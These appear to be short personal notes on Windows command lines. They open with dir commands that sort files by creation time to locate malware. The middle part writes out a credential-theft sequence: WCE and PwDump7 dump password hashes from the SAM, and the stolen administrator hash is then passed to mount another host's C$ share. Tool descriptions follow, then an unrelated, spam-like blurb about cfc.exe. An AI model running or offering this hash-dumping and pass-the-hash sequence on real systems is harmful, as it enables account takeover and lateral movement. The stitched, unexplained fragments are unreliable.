dir /tc malware
2017/01/01 下午 01:32 malware
dir /a /s /tc /od c:\ | find "2017/01/01 下午 01:3" (time range)
dir /a /s /tc /o-d c:\windows\system32 |more
*************************************************
use wce.exe and PwDump7.exe
wce.exe
wce.exe -w
PwDump7.exe
Administrator:500:xxxx
wce.exe -s Administrator:test:xxxx
net use \\test\c$
Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).
We have developed a new password dumper for windows named PWDUMP7. The main difference between pwdump7 and other pwdump tools is that our tool runs by extracting the binary SAM and SYSTEM File from the Filesystem and then the hashes are extracted. For that task Rkdetector NTFS and FAT32 filesystem drivers are used.
*************************************************
cfc.exe is a product CompFileChecker with H.KINOSHITA company,it version is 0.0.2.0,size is 609792. cfc.exe virus or errors should be disabled and removed if it was attacked and brought you windows xp/vista/7/windows 10 errors.
cfc.exe algx.exe c:\windows\winhelp.exe
